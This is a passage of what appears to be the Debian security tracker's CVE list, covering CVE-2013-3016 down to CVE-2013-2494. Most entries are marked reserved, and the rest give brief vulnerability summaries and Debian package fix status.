CVE-2013-3016 RESERVED CVE-2013-3015 RESERVED CVE-2013-3014 RESERVED CVE-2013-3013 RESERVED CVE-2013-3012 RESERVED CVE-2013-3011 RESERVED CVE-2013-3010 RESERVED CVE-2013-3009 RESERVED CVE-2013-3008 RESERVED CVE-2013-3007 RESERVED CVE-2013-3006 RESERVED CVE-2013-3005 RESERVED CVE-2013-3004 RESERVED CVE-2013-3003 RESERVED CVE-2013-3002 RESERVED CVE-2013-3001 RESERVED CVE-2013-3000 RESERVED CVE-2013-2999 RESERVED CVE-2013-2998 RESERVED CVE-2013-2997 RESERVED CVE-2013-2996 RESERVED CVE-2013-2995 RESERVED CVE-2013-2994 RESERVED CVE-2013-2993 RESERVED CVE-2013-2992 RESERVED CVE-2013-2991 RESERVED CVE-2013-2990 RESERVED CVE-2013-2989 RESERVED CVE-2013-2988 RESERVED CVE-2013-2987 RESERVED CVE-2013-2986 RESERVED CVE-2013-2985 RESERVED CVE-2013-2984 RESERVED CVE-2013-2983 RESERVED CVE-2013-2982 RESERVED CVE-2013-2981 RESERVED CVE-2013-2980 RESERVED CVE-2013-2979 RESERVED CVE-2013-2978 RESERVED CVE-2013-2977 (Integer overflow in IBM Notes 8.5.x before 8.5.3 FP4 Interim Fix 1 and ...) 
NOT-FOR-US: IBM Notes CVE-2013-2976 RESERVED CVE-2013-2975 RESERVED CVE-2013-2974 RESERVED CVE-2013-2973 RESERVED CVE-2013-2972 RESERVED CVE-2013-2971 RESERVED CVE-2013-2970 RESERVED CVE-2013-2969 RESERVED CVE-2013-2968 RESERVED CVE-2013-2967 RESERVED CVE-2013-2966 RESERVED CVE-2013-2965 RESERVED CVE-2013-2964 RESERVED CVE-2013-2963 RESERVED CVE-2013-2962 RESERVED CVE-2013-2961 RESERVED CVE-2013-2960 RESERVED CVE-2013-2959 RESERVED CVE-2013-2958 RESERVED CVE-2013-2957 RESERVED CVE-2013-2956 RESERVED CVE-2013-2955 RESERVED CVE-2013-2954 RESERVED CVE-2013-2953 RESERVED CVE-2013-2952 RESERVED CVE-2013-2951 RESERVED CVE-2013-2950 RESERVED CVE-2013-2949 RESERVED CVE-2013-2948 RESERVED CVE-2013-2947 RESERVED CVE-2013-2946 RESERVED CVE-2013-2945 RESERVED CVE-2013-2944 (strongSwan 4.3.5 through 5.0.3, when using the OpenSSL plugin for ...) {DSA-2665-1} - strongswan 4.6.4-7 CVE-2013-2943 RESERVED CVE-2013-2942 RESERVED CVE-2013-2941 RESERVED CVE-2013-2940 RESERVED CVE-2013-2939 RESERVED CVE-2013-2938 RESERVED CVE-2013-2937 RESERVED CVE-2013-2936 RESERVED CVE-2013-2935 RESERVED CVE-2013-2934 RESERVED CVE-2013-2933 RESERVED CVE-2013-2932 RESERVED CVE-2013-2931 RESERVED CVE-2013-2930 RESERVED CVE-2013-2929 RESERVED CVE-2013-2928 RESERVED CVE-2013-2927 RESERVED CVE-2013-2926 RESERVED CVE-2013-2925 RESERVED CVE-2013-2924 RESERVED CVE-2013-2923 RESERVED CVE-2013-2922 RESERVED CVE-2013-2921 RESERVED CVE-2013-2920 RESERVED CVE-2013-2919 RESERVED CVE-2013-2918 RESERVED CVE-2013-2917 RESERVED CVE-2013-2916 RESERVED CVE-2013-2915 RESERVED CVE-2013-2914 RESERVED CVE-2013-2913 RESERVED CVE-2013-2912 RESERVED CVE-2013-2911 RESERVED CVE-2013-2910 RESERVED CVE-2013-2909 RESERVED CVE-2013-2908 RESERVED CVE-2013-2907 RESERVED CVE-2013-2906 RESERVED CVE-2013-2905 RESERVED CVE-2013-2904 RESERVED CVE-2013-2903 RESERVED CVE-2013-2902 RESERVED CVE-2013-2901 RESERVED CVE-2013-2900 RESERVED CVE-2013-2899 RESERVED CVE-2013-2898 RESERVED CVE-2013-2897 RESERVED CVE-2013-2896 RESERVED CVE-2013-2895 
RESERVED CVE-2013-2894 RESERVED CVE-2013-2893 RESERVED CVE-2013-2892 RESERVED CVE-2013-2891 RESERVED CVE-2013-2890 RESERVED CVE-2013-2889 RESERVED CVE-2013-2888 RESERVED CVE-2013-2887 RESERVED CVE-2013-2886 RESERVED CVE-2013-2885 RESERVED CVE-2013-2884 RESERVED CVE-2013-2883 RESERVED CVE-2013-2882 RESERVED CVE-2013-2881 RESERVED CVE-2013-2880 RESERVED CVE-2013-2879 RESERVED CVE-2013-2878 RESERVED CVE-2013-2877 RESERVED CVE-2013-2876 RESERVED CVE-2013-2875 RESERVED CVE-2013-2874 RESERVED CVE-2013-2873 RESERVED CVE-2013-2872 RESERVED CVE-2013-2871 RESERVED CVE-2013-2870 RESERVED CVE-2013-2869 RESERVED CVE-2013-2868 RESERVED CVE-2013-2867 RESERVED CVE-2013-2866 RESERVED CVE-2013-2865 RESERVED CVE-2013-2864 RESERVED CVE-2013-2863 RESERVED CVE-2013-2862 RESERVED CVE-2013-2861 RESERVED CVE-2013-2860 RESERVED CVE-2013-2859 RESERVED CVE-2013-2858 RESERVED CVE-2013-2857 RESERVED CVE-2013-2856 RESERVED CVE-2013-2855 RESERVED CVE-2013-2854 RESERVED CVE-2013-2853 RESERVED CVE-2013-2852 RESERVED CVE-2013-2851 RESERVED CVE-2013-2850 RESERVED CVE-2013-2849 RESERVED CVE-2013-2848 RESERVED CVE-2013-2847 RESERVED CVE-2013-2846 RESERVED CVE-2013-2845 RESERVED CVE-2013-2844 RESERVED CVE-2013-2843 RESERVED CVE-2013-2842 RESERVED CVE-2013-2841 RESERVED CVE-2013-2840 RESERVED CVE-2013-2839 RESERVED CVE-2013-2838 RESERVED CVE-2013-2837 RESERVED CVE-2013-2836 RESERVED CVE-2013-2835 (Google Chrome OS before 26.0.1410.57 does not properly enforce origin ...) NOT-FOR-US: Google Chrome OS CVE-2013-2834 (Google Chrome OS before 26.0.1410.57 does not properly enforce origin ...) NOT-FOR-US: Google Chrome OS CVE-2013-2833 (Use-after-free vulnerability in the O3D plug-in in Google Chrome OS ...) NOT-FOR-US: Google Chrome OS CVE-2013-2832 (The Buffer::Set function in core/cross/buffer.cc in the O3D plug-in in ...) 
NOT-FOR-US: Google Chrome OS CVE-2013-2831 RESERVED CVE-2013-2830 RESERVED CVE-2013-2829 RESERVED CVE-2013-2828 RESERVED CVE-2013-2827 RESERVED CVE-2013-2826 RESERVED CVE-2013-2825 RESERVED CVE-2013-2824 RESERVED CVE-2013-2823 RESERVED CVE-2013-2822 RESERVED CVE-2013-2821 RESERVED CVE-2013-2820 RESERVED CVE-2013-2819 RESERVED CVE-2013-2818 RESERVED CVE-2013-2817 RESERVED CVE-2013-2816 RESERVED CVE-2013-2815 RESERVED CVE-2013-2814 RESERVED CVE-2013-2813 RESERVED CVE-2013-2812 RESERVED CVE-2013-2811 RESERVED CVE-2013-2810 RESERVED CVE-2013-2809 RESERVED CVE-2013-2808 RESERVED CVE-2013-2807 RESERVED CVE-2013-2806 RESERVED CVE-2013-2805 RESERVED CVE-2013-2804 RESERVED CVE-2013-2803 RESERVED CVE-2013-2802 RESERVED CVE-2013-2801 RESERVED CVE-2013-2800 RESERVED CVE-2013-2799 RESERVED CVE-2013-2798 RESERVED CVE-2013-2797 RESERVED CVE-2013-2796 RESERVED CVE-2013-2795 RESERVED CVE-2013-2794 RESERVED CVE-2013-2793 RESERVED CVE-2013-2792 RESERVED CVE-2013-2791 RESERVED CVE-2013-2790 RESERVED CVE-2013-2789 RESERVED CVE-2013-2788 RESERVED CVE-2013-2787 RESERVED CVE-2013-2786 RESERVED CVE-2013-2785 RESERVED CVE-2013-2784 RESERVED CVE-2013-2783 RESERVED CVE-2013-2782 RESERVED CVE-2013-2781 RESERVED CVE-2013-2780 (Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to ...) NOT-FOR-US: Siemens SIMATIC CVE-2013-2779 (Cisco IOS XE 3.4 before 3.4.5S, and 3.5 through 3.7 before 3.7.1S, on ...) NOT-FOR-US: Cisco IOS XE CVE-2013-2778 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: PHP Address Book CVE-2013-2777 (sudo before 1.7.10p5 and 1.8.x before 1.8.6p6, when the tty_tickets ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701839) CVE-2013-2776 (sudo 1.3.5 through 1.7.10p5 and 1.8.0 through 1.8.6p6, when running on ...) 
	{DSA-2642-1}
	- sudo 1.8.5p2-1+nmu1 (bug #701839)
CVE-2013-2775
	RESERVED
CVE-2013-2774
	RESERVED
CVE-2013-2773
	RESERVED
CVE-2013-2772
	RESERVED
CVE-2013-2771
	RESERVED
CVE-2013-2770 (The installation functionality in the Novell Kanaka component before ...)
	NOT-FOR-US: Novell Open Enterprise Server (OES) on Mac OS X
CVE-2013-2769
	RESERVED
CVE-2013-2768
	RESERVED
CVE-2013-2767 (Unspecified vulnerability in Citrix NetScaler Access Gateway ...)
	NOT-FOR-US: Citrix NetScaler Access Gateway
CVE-2013-2766 (Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk 4.3.0 ...)
	NOT-FOR-US: Splunk
CVE-2013-2765
	RESERVED
CVE-2013-2764
	RESERVED
CVE-2013-XXXX [imagemagick: null pointer dereference]
	- imagemagick (low; bug #704901)
CVE-2013-2763 (** DISPUTED ** The Schneider Electric M340 PLC modules allow remote ...)
	NOT-FOR-US: Schneider Electric M340 modules
CVE-2013-2762 (The Schneider Electric Magelis XBT HMI controller has a default ...)
	NOT-FOR-US: Schneider Electric
CVE-2013-2761 (The Schneider Electric M340 BMXNOE01xx and BMXP3420xx PLC modules ...)
	NOT-FOR-US: Schneider Electric
CVE-2013-2760 (Buffer overflow in Groovy Media Player 3.2.0 allows remote attackers ...)
	NOT-FOR-US: Groovy Media Player
CVE-2013-2759
	RESERVED
CVE-2013-2758
	RESERVED
	NOT-FOR-US: CloudStack
CVE-2013-2757
	RESERVED
CVE-2013-2756
	RESERVED
	NOT-FOR-US: CloudStack
CVE-2013-2755
	RESERVED
CVE-2013-2754
	RESERVED
CVE-2013-2753
	RESERVED
CVE-2013-2752
	RESERVED
CVE-2013-2751
	RESERVED
CVE-2013-2750
	RESERVED
CVE-2013-2749
	RESERVED
CVE-2013-2748
	RESERVED
CVE-2013-2747
	RESERVED
CVE-2013-2746
	RESERVED
CVE-2013-2745
	RESERVED
CVE-2013-2744 (importbuddy.php in the BackupBuddy plugin 2.2.25 for WordPress allows ...)
	NOT-FOR-US: BackupBuddy plugin for WordPress
CVE-2013-2743 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, ...)
	NOT-FOR-US: BackupBuddy plugin for WordPress
CVE-2013-2742 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, ...)
	NOT-FOR-US: BackupBuddy plugin for WordPress
CVE-2013-2741 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, ...)
	NOT-FOR-US: BackupBuddy plugin for WordPress
CVE-2013-2740
	RESERVED
CVE-2013-2739
	RESERVED
CVE-2013-2738
	RESERVED
CVE-2013-2737 (A JavaScript API in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2736 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2735 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2734 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2733 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2732 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2731 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2730 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2729 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2728 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash
CVE-2013-2727 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2726 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2725 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2724 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2723 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2722 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2721 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2720 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2719 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2718 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2717 (Multiple unspecified vulnerabilities in the System Management (aka ...)
	NOT-FOR-US: EMC
CVE-2012-6550 (Cross-site scripting (XSS) vulnerability in ZeroClipboard before 1.0.8 ...)
	- db4o (unimportant)
	NOTE: in doc package only
CVE-2013-2716 (Puppet Labs Puppet Enterprise before 2.8.0 does not use a "randomized ...)
	NOT-FOR-US: Puppet Labs Puppet Enterprise
CVE-2013-2715 (Cross-site scripting (XSS) vulnerability in the admin view in the ...)
	NOT-FOR-US: Drupal module search_api
CVE-2013-2714
	RESERVED
CVE-2013-2713
	RESERVED
CVE-2013-2712
	RESERVED
CVE-2013-2711
	RESERVED
CVE-2013-2710
	RESERVED
CVE-2013-2709 (Cross-site request forgery (CSRF) vulnerability in the FourSquare ...)
	NOT-FOR-US: WordPress plugin FourSquare Checkins
CVE-2013-2708
	RESERVED
CVE-2013-2707 (Cross-site request forgery (CSRF) vulnerability in the Login With Ajax ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-2706
	RESERVED
CVE-2013-2705
	RESERVED
CVE-2013-2704
	RESERVED
CVE-2013-2703 (Cross-site request forgery (CSRF) vulnerability in the Facebook ...)
	NOT-FOR-US: Facebook Members plugin for WordPress
CVE-2013-2702 (Cross-site request forgery (CSRF) vulnerability in the Easy AdSense ...)
	NOT-FOR-US: Easy AdSense Lite plugin for WordPress
CVE-2013-2701
	RESERVED
CVE-2013-2700
	RESERVED
CVE-2013-2699
	RESERVED
CVE-2013-2698
	RESERVED
CVE-2013-2697 (Cross-site request forgery (CSRF) vulnerability in the ...)
	NOT-FOR-US: Wordpress plugin Downloadmanager
CVE-2013-2696 (Cross-site request forgery (CSRF) vulnerability in the All in One ...)
	NOT-FOR-US: WordPress plugin All in One Webmaster
CVE-2013-2695
	RESERVED
CVE-2013-2694
	RESERVED
CVE-2013-2693
	RESERVED
CVE-2013-2692
	RESERVED
CVE-2013-2691
	RESERVED
CVE-2013-2690 (SQL injection vulnerability in index.php in Synchroweb Technology ...)
	NOT-FOR-US: Synchroweb Technology SynConnect 2.0
CVE-2013-2689
	RESERVED
CVE-2013-2688
	RESERVED
CVE-2013-2687
	RESERVED
CVE-2013-2686 (main/http.c in the HTTP server in Asterisk Open Source 1.8.x before ...)
	- asterisk 1:1.8.13.1~dfsg-2 (bug #704114)
	[squeeze] - asterisk (httpd code does not read HTTP POST variables)
	NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-20967
CVE-2013-2685 (Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk ...)
	- asterisk (H264 code not yet present)
	NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-20901
CVE-2013-2684
	RESERVED
CVE-2013-2683
	RESERVED
CVE-2013-2682
	RESERVED
CVE-2013-2681
	RESERVED
CVE-2013-2680
	RESERVED
CVE-2013-2679
	RESERVED
CVE-2013-2678
	RESERVED
CVE-2013-2677
	RESERVED
CVE-2013-2676
	RESERVED
CVE-2013-2675
	RESERVED
CVE-2013-2674
	RESERVED
CVE-2013-2673
	RESERVED
CVE-2013-2672
	RESERVED
CVE-2013-2671
	RESERVED
CVE-2013-2670
	RESERVED
CVE-2013-2669
	RESERVED
CVE-2013-2668
	RESERVED
CVE-2013-2667
	RESERVED
CVE-2013-2666
	RESERVED
CVE-2013-2665
	RESERVED
CVE-2013-2664
	RESERVED
CVE-2013-2663
	RESERVED
CVE-2013-2662
	RESERVED
CVE-2013-2661
	RESERVED
CVE-2013-2660
	RESERVED
CVE-2013-2659
	RESERVED
CVE-2013-2658
	RESERVED
CVE-2013-2657
	RESERVED
CVE-2013-2656
	RESERVED
CVE-2013-2655
	RESERVED
CVE-2013-2654
	RESERVED
CVE-2013-2653
	RESERVED
CVE-2013-2652
	RESERVED
CVE-2013-2651
	RESERVED
CVE-2013-2650
	RESERVED
CVE-2013-2649
	RESERVED
CVE-2013-2648
	RESERVED
CVE-2013-2647
	RESERVED
CVE-2013-2646
	RESERVED
CVE-2013-2645
	RESERVED
CVE-2013-2644
	RESERVED
CVE-2013-2643
	RESERVED
CVE-2013-2642
	RESERVED
CVE-2013-2641
	RESERVED
CVE-2013-2640 (ajax.functions.php in the MailUp plugin before 1.3.2 for WordPress ...)
	NOT-FOR-US: MailUp plugin for Wordpress
CVE-2013-2639
	RESERVED
CVE-2013-2638
	RESERVED
CVE-2013-2637
	RESERVED
CVE-2013-2636 (net/bridge/br_mdb.c in the Linux kernel before 3.8.4 does not ...)
	- linux (Introduced in 3.8)
	- linux-2.6 (Introduced in 3.8)
CVE-2013-2635 (The rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux ...)
	- linux 3.2.41-2
	- linux-2.6
	[squeeze] - linux-2.6 (Introduced in 2.6.34)
CVE-2013-2634 (net/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize ...)
	{DSA-2668-1}
	- linux 3.2.41-2
	- linux-2.6
CVE-2013-2633 (Piwik before 1.11 accepts input from a POST request instead of a GET ...)
	- piwik (bug #506933)
CVE-2013-2632 (Google V8 before 3.17.13, as used in Google Chrome before 27.0.1444.3, ...)
	- libv8
CVE-2013-2631
	RESERVED
CVE-2013-2630
	RESERVED
CVE-2013-2629
	RESERVED
CVE-2013-2628
	RESERVED
CVE-2013-2627
	RESERVED
CVE-2013-2626
	RESERVED
CVE-2013-2625
	RESERVED
	- otrs2 3.1.7+dfsg1-8
	NOTE: http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2013-01/
CVE-2013-2624
	RESERVED
CVE-2013-2623
	RESERVED
CVE-2013-2622
	RESERVED
CVE-2013-2621
	RESERVED
CVE-2013-2620
	RESERVED
CVE-2013-2619
	RESERVED
CVE-2013-2618
	RESERVED
CVE-2013-2617 (lib/curl.rb in the Curl Gem for Ruby allows remote attackers to ...)
	NOT-FOR-US: Ruby Curl gem
CVE-2013-2616 (lib/mini_magick.rb in the MiniMagick Gem 1.3.1 for Ruby allows remote ...)
	NOT-FOR-US: Ruby MiniMagick gem
CVE-2013-2615 (lib/entry_controller.rb in the fastreader Gem 1.0.8 for Ruby allows ...)
	NOT-FOR-US: Ruby fastreader gem
CVE-2013-2614
	RESERVED
CVE-2013-2613
	RESERVED
CVE-2013-2612
	RESERVED
CVE-2013-2611
	RESERVED
CVE-2013-2610
	RESERVED
CVE-2013-2609
	RESERVED
CVE-2013-2608
	RESERVED
CVE-2013-2607
	RESERVED
CVE-2013-2606
	RESERVED
CVE-2013-2605
	RESERVED
CVE-2013-2604
	RESERVED
CVE-2013-2603
	RESERVED
CVE-2013-2602
	RESERVED
CVE-2013-2601
	RESERVED
CVE-2013-2600
	RESERVED
CVE-2013-2599
	RESERVED
CVE-2013-2598
	RESERVED
CVE-2013-2597
	RESERVED
CVE-2013-2596 (Integer overflow in the fb_mmap function in drivers/video/fbmem.c in ...)
	TODO: check implications for our linux kernels
	NOTE: the issue comes from fbmem code from linux mainline, the exploit was just targeting motorola
	NOTE: phones that ship code that is based on the original linux code, but both are affected.
CVE-2013-2595
	RESERVED
	NOT-FOR-US: Qualcomm MSM Camera driver
CVE-2013-2594
	RESERVED
CVE-2013-2593
	RESERVED
CVE-2013-2592
	RESERVED
CVE-2013-2591
	RESERVED
CVE-2013-2590
	RESERVED
CVE-2013-2589
	RESERVED
CVE-2013-2588
	RESERVED
CVE-2013-2587
	RESERVED
CVE-2013-2586
	RESERVED
CVE-2013-2585
	RESERVED
CVE-2013-2584
	RESERVED
CVE-2013-2583
	RESERVED
CVE-2013-2582
	RESERVED
CVE-2013-2581
	RESERVED
CVE-2013-2580
	RESERVED
CVE-2013-2579
	RESERVED
CVE-2013-2578
	RESERVED
CVE-2013-2577
	RESERVED
CVE-2013-2576
	RESERVED
CVE-2013-2575
	RESERVED
CVE-2013-2574
	RESERVED
CVE-2013-2573
	RESERVED
CVE-2013-2572
	RESERVED
CVE-2013-2571
	RESERVED
CVE-2013-2570
	RESERVED
CVE-2013-2569
	RESERVED
CVE-2013-2568
	RESERVED
CVE-2013-2567
	RESERVED
CVE-2013-2566 (The RC4 algorithm, as used in the TLS protocol and SSL protocol, has ...)
	NOTE: Generic protocol flaw in RC4
CVE-2012-6549 (The isofs_export_encode_fh function in fs/isofs/export.c in the Linux ...)
	{DSA-2668-1}
	- linux 3.2.41-1 (low)
	- linux-2.6 (low)
CVE-2012-6548 (The udf_encode_fh function in fs/udf/namei.c in the Linux kernel ...)
	{DSA-2668-1}
	- linux 3.2.41-1 (low)
	- linux-2.6 (low)
CVE-2012-6547 (The __tun_chr_ioctl function in drivers/net/tun.c in the Linux kernel ...)
	- linux 3.2.29-1 (low)
	- linux-2.6 (low)
CVE-2012-6546 (The ATM implementation in the Linux kernel before 3.6 does not ...)
	{DSA-2668-1}
	- linux 3.2.30-1 (low)
	- linux-2.6 (low)
CVE-2012-6545 (The Bluetooth RFCOMM implementation in the Linux kernel before 3.6 ...)
	{DSA-2668-1}
	- linux 3.2.30-1 (low)
	- linux-2.6 (low)
CVE-2012-6544 (The Bluetooth protocol stack in the Linux kernel before 3.6 does not ...)
	{DSA-2668-1}
	- linux 3.2.30-1 (low)
	- linux-2.6 (low)
CVE-2012-6543 (The l2tp_ip6_getname function in net/l2tp/l2tp_ip6.c in the Linux ...)
	- linux (Affected code introduced in 3.5)
	- linux-2.6 (Affected code introduced in 3.5)
CVE-2012-6542 (The llc_ui_getname function in net/llc/af_llc.c in the Linux kernel ...)
	{DSA-2668-1}
	- linux 3.2.30-1 (low)
	- linux-2.6 (low)
CVE-2012-6541 (The ccid3_hc_tx_getsockopt function in net/dccp/ccids/ccid3.c in the ...)
	- linux 3.2.30-1 (low)
	- linux-2.6 (low)
	[squeeze] - linux-2.6 (Introduced in 2.6.37)
CVE-2012-6540 (The do_ip_vs_get_ctl function in net/netfilter/ipvs/ip_vs_ctl.c in the ...)
	{DSA-2668-1}
	- linux 3.2.30-1 (low)
	- linux-2.6 (low)
CVE-2012-6539 (The dev_ifconf function in net/socket.c in the Linux kernel before 3.6 ...)
	{DSA-2668-1}
	- linux 3.2.30-1 (low)
	- linux-2.6 (low)
CVE-2012-6538 (The copy_to_user_auth function in net/xfrm/xfrm_user.c in the Linux ...)
	- linux 3.2.32-1 (low)
	- linux-2.6 (low)
	[squeeze] - linux-2.6 (Introduced in 2.6.33)
CVE-2012-6537 (net/xfrm/xfrm_user.c in the Linux kernel before 3.6 does not ...)
	{DSA-2668-1}
	- linux 3.2.32-1 (low)
	- linux-2.6 (low)
CVE-2012-6536 (net/xfrm/xfrm_user.c in the Linux kernel before 3.6 does not verify ...)
	- linux 3.2.32-1 (low)
	- linux-2.6 (low)
	[squeeze] - linux-2.6 (Introduced in 2.6.39)
CVE-2012-XXXX [null pointer dereference]
	- chromium-browser 21.0.1180.57~r148591-1
	NOTE: http://seclists.org/fulldisclosure/2013/Mar/134
	NOTE: full disclosure post doesn't make it clear if a CVE was assigned for this or not, but it is fixed in the above version
CVE-2013-2565
	RESERVED
	NOT-FOR-US: Mambo CMS
CVE-2013-2564
	RESERVED
	NOT-FOR-US: Mambo CMS
CVE-2013-2563
	RESERVED
	NOT-FOR-US: Mambo CMS
CVE-2013-2562
	RESERVED
	NOT-FOR-US: Mambo CMS
CVE-2013-2561 [improper use of files in /tmp]
	RESERVED
	- ibutils (low; bug #704063)
	[squeeze] - ibutils (Minor issue)
	[wheezy] - ibutils (Minor issue)
CVE-2013-2560 (Directory traversal vulnerability in the web interface on Foscam ...)
	NOT-FOR-US: Foscam
CVE-2013-2559
	RESERVED
CVE-2013-2558 (Unspecified vulnerability in Microsoft Windows 8 allows remote ...)
	NOT-FOR-US: Windows 8
CVE-2013-2557 (The sandbox protection mechanism in Microsoft Internet Explorer 9 ...)
	NOT-FOR-US: Internet Explorer
CVE-2013-2556 (Unspecified vulnerability in Microsoft Windows 7 allows attackers to ...)
	NOT-FOR-US: Windows 7
CVE-2013-2555 (Integer overflow in Adobe Flash Player before 10.3.183.75 and 11.x ...)
	NOT-FOR-US: Adobe Flash plugin
CVE-2013-2554 (Unspecified vulnerability in Microsoft Windows 7 allows attackers to ...)
	NOT-FOR-US: Windows 7
CVE-2013-2553 (Unspecified vulnerability in the kernel in Microsoft Windows 7 allows ...)
	NOT-FOR-US: Windows 7
CVE-2013-2552 (Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows ...)
	NOT-FOR-US: Internet Explorer
CVE-2013-2551 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Internet Explorer
CVE-2013-2550 (Unspecified vulnerability in Adobe Reader 11.0.02 allows attackers to ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2549 (Unspecified vulnerability in Adobe Reader 11.0.02 allows remote ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-2548 (The crypto_report_one function in crypto/crypto_user.c in the report ...)
	- linux 3.2.41-1 (low)
	- linux-2.6 (Introduced in 3.2)
CVE-2013-2547 (The crypto_report_one function in crypto/crypto_user.c in the report ...)
	- linux 3.2.41-1 (low)
	- linux-2.6 (Introduced in 3.2)
CVE-2013-2546 (The report API in the crypto user configuration API in the Linux ...)
	- linux 3.2.41-1 (low)
	- linux-2.6 (Introduced in 3.2)
CVE-2013-2545
	RESERVED
CVE-2013-2544
	RESERVED
CVE-2013-2543
	RESERVED
CVE-2013-2542
	RESERVED
CVE-2013-2541
	RESERVED
CVE-2013-2540
	RESERVED
CVE-2013-2539
	RESERVED
CVE-2013-2538
	RESERVED
CVE-2013-2537
	RESERVED
CVE-2013-2536
	RESERVED
CVE-2013-2535
	RESERVED
CVE-2013-2534
	RESERVED
CVE-2013-2533
	RESERVED
CVE-2013-2532
	RESERVED
CVE-2013-2531
	RESERVED
CVE-2013-2530
	RESERVED
CVE-2013-2529
	RESERVED
CVE-2013-2528
	RESERVED
CVE-2013-2527
	RESERVED
CVE-2013-2526
	RESERVED
CVE-2013-2525
	RESERVED
CVE-2013-2524
	RESERVED
CVE-2013-2523
	RESERVED
CVE-2013-2522
	RESERVED
CVE-2013-2521
	RESERVED
CVE-2013-2520
	RESERVED
CVE-2013-2519
	RESERVED
CVE-2013-2518
	RESERVED
CVE-2013-2517
	RESERVED
CVE-2013-2516
	RESERVED
CVE-2013-2515
	RESERVED
CVE-2013-2514
	RESERVED
CVE-2013-2513
	RESERVED
CVE-2013-2512
	RESERVED
CVE-2013-2511
	RESERVED
CVE-2013-2510
	RESERVED
CVE-2013-2509
	RESERVED
CVE-2013-2508
	RESERVED
CVE-2013-2507
	RESERVED
CVE-2013-2506 (app/models/spree/user.rb in spree_auth_devise in Spree 1.1.x before ...)
	NOT-FOR-US: Spree
CVE-2012-6535
	RESERVED
CVE-2013-2505
	RESERVED
CVE-2013-2504
	RESERVED
CVE-2013-2503 (Privoxy before 3.0.21 does not properly handle Proxy-Authenticate and ...)
	- privoxy (low; bug #702896)
	[wheezy] - privoxy (Minor issue)
	[squeeze] - privoxy (Minor issue)
	NOTE: http://blog.c22.cc/2013/03/11/privoxy-proxy-authentication-credential-exposure-cve-2013-2503/
	NOTE: http://ijbswa.cvs.sourceforge.net/viewvc/ijbswa/current/ChangeLog?revision=1.188&view=markup
CVE-2013-2502
	RESERVED
CVE-2013-2501 (Cross-site scripting (XSS) vulnerability in the Terillion Reviews ...)
	NOT-FOR-US: Terillion Reviews plugin for Wordpress
CVE-2013-2500
	RESERVED
CVE-2013-2499
	RESERVED
CVE-2013-2498
	RESERVED
CVE-2013-2497
	RESERVED
CVE-2013-2496 (The msrle_decode_8_16_24_32 function in msrledec.c in libavcodec in ...)
	- libav 6:0.8.6-1 (bug #703200)
	- ffmpeg
CVE-2013-2495 (The iff_read_header function in iff.c in libavformat in FFmpeg through ...)
	- libav 6:0.8.6-1 (bug #703200)
	- ffmpeg
CVE-2013-2494 (libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to ...)
	- isc-dhcp 4.2.4-6 (low; bug #704426)
